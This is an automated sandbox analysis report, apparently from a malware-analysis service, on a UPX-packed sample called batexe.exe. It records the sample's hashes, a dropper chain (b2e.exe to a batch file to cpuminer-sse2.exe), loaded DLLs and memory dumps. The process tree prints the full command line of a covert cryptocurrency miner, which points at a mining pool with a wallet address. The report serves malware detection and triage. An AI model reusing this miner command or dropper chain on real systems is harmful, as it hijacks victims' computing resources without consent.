73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
305s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24/02/2024, 03:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1628	b2e.exe
4840	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4840	cpuminer-sse2.exe
4840	cpuminer-sse2.exe
4840	cpuminer-sse2.exe
4840	cpuminer-sse2.exe
4840	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2400-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 1628	2400	batexe.exe	72
PID 2400 wrote to memory of 1628	2400	batexe.exe	72
PID 2400 wrote to memory of 1628	2400	batexe.exe	72
PID 1628 wrote to memory of 4008	1628	b2e.exe	73
PID 1628 wrote to memory of 4008	1628	b2e.exe	73
PID 1628 wrote to memory of 4008	1628	b2e.exe	73
PID 4008 wrote to memory of 4840	4008	cmd.exe	76
PID 4008 wrote to memory of 4840	4008	cmd.exe	76

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Users\Admin\AppData\Local\Temp\A921.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A921.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A921.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AD18.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A921.tmp\b2e.exe

Filesize
5.9MB

MD5
18792922f664a9a640900e5445021a38

SHA1
90d4ae26947f5ed1b309fb30f1406d9a7eebaebe

SHA256
adf001589fec4ece891bba8dd5f389c399cc96282cbfe10d49ff3c7ebe1b9e12

SHA512
899e6709cd3ae06c948362b35b35ad33457f493b2dc03b2ea6a8c717f71dc7a1f8972e60d2fe3fa2d5ecf2047980f15da95d79d87178f067e4cbbd441ad7d619

Download Submit
C:\Users\Admin\AppData\Local\Temp\A921.tmp\b2e.exe

Filesize
5.0MB

MD5
72d9b7f2eeac27d69ac861be4a4e8fcc

SHA1
e5be26aac105e0798572e5b201b4a91f1299586b

SHA256
977b567b21ec9f5f89cc8d11b70be633634a1c9953f34b206059965a548de849

SHA512
9b5a425e3cc1b971e776c477625d5e14aa397ba58f0e631ee0247a7b633c49ef400047a0508b897e4ac1ab9b6eadd26436e75f21dc8681ecb62dec47ebb98dd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD18.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.2MB

MD5
2e8408109a14eb634104ae3bc331775c

SHA1
104a410e6633d1d4946810221dc762d7db1a278c

SHA256
163fa7bfe3f55023cc5d04fcb4cf3b42a4cceed97187a846984ca30a34efdff3

SHA512
803a1103e762b92003645d3ce05edb8e490a40784d39f20644f505522d1e2941cb24cdd32614fb0b62e2bab246bec2dad629ffec1dac8567aaf12c92f65add91

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
640KB

MD5
0f6af9e19fa927d88313e98d54420920

SHA1
0aff9c72864126107d6c630aafb9ed6512042afd

SHA256
71661d7077b93e2a5e53d7093e532bec1b66d34e3929bcb314eab7f431b84734

SHA512
bba078e2f4eb5ca45956657356f7419767a81679f34d9991bf28a1d44e412340d1002517f74a15583ffe20b32f1f25b60c47f4581100552dc1e651b3f88547be

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
704KB

MD5
903e2cfee96d720dd5200a922b637d07

SHA1
f6d639d7b6bb586abcb5f97b1b212252ed6c85b2

SHA256
443ef0fe0e5e9cff04e267b1bbbbc98b547e5bd38a853eb79d06a43a8e7d17f2

SHA512
c9c357be28d1d97bd5255d88bc64255f452867407c3aa4c99b286913286780da1204691a0344514f070b8bad391980a88b165eb1e8e9ee97f77ef02eb85071c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
384KB

MD5
b91f7bb5508b343188ec32dcc7880611

SHA1
fe2ae7ba4a1bbb2a5df7b73f21a0b8fc745cc11f

SHA256
47881756cdfcb302e63efb2016c122a1bb61574d81186275aef3d5a9fb72b84b

SHA512
a5b91bc653cbf28219b6f169d5d849fb53eced9a932b8edf468c9092544795ee8120d5c76f0c45f27b7a2464c328f5bffcabf3e83d2e7236263ea930cf92eea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
640KB

MD5
1b7339cbcb5b756c15c05fe0cc6443f3

SHA1
abdba01c4526a9bbbb7fd3853e09bce3cbb5287d

SHA256
5fcf0fb116f77206758e3a669ec4fa52648fae431a5c2aa2d7ee69944142e019

SHA512
7661b5e8413e74432a00089b1556b2f49e268b6b5c8cefd839cbe19074bffd138c18e8078627420f4082f579a9e3f8d02b199507ae36380b5375162a4d4ba439

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
576KB

MD5
2caab2ad7ccd18421c96ea2ef5b9e602

SHA1
a629673c12e88ef88f30cbe8da12d3afb9a7d42c

SHA256
c16fbf658c970a716b976abe7c5d9f1b1a42dacd55a43b16fec0ecc6b84f0552

SHA512
aa9692584947d7fdbe843e877430ade40c5b4c6e15887005a292065d6f8e1303abc8dfc2bf50c01fb032bdfeca5bb2aa9312ba44d7ba4e2d3529d07bfd008969

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
448KB

MD5
19a61444b6e2d01755ede80960bca19c

SHA1
e0c7222784d3e2b3329ec3280648b17fd60ef209

SHA256
13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

SHA512
bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
448KB

MD5
8185100383d0fe360c9198e5a883b08d

SHA1
ab398c469573f8e84d3cfcef01287a0604d6ab5f

SHA256
05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

SHA512
24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
384KB

MD5
4cb3a8d3af58faf78da4dd33a03029db

SHA1
5356e4fb04a7047f6fc82a4e071e4803f97a0f3d

SHA256
86df790940bd442466ea58a434a31aaaadd1d23a9e9bf5e6fe625ff49049d620

SHA512
244237f4a13a7666e9f9592451dbb8bb18ca1f828d66f97e2890fa8f6be690d8890848102a8be253542c9f4b154d9f0e1aeeee5a867c866b78b64f9949f48c89

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
448KB

MD5
9d1a04f05f75671a5a3ffeb995176c52

SHA1
a45018bb6a5dd52b310c1eb77262354365925a76

SHA256
c777e9d786f5d1d13f78a925453804bf53ee430a38f893f115c2d1ac0f2f07ff

SHA512
d19ea63c26c1d41edd5947d0c5ae70e2461c876563c2baeb1fd4a3986254f7919f8d4c32a9d6b9f4c51c4d5a23ffa90a2011d293a106a0a8813295b2bee06e1f

Download Submit
memory/1628-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1628-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2400-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4840-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4840-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4840-43-0x0000000069240000-0x00000000692D8000-memory.dmp

Filesize
608KB

Download
memory/4840-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4840-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4840-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download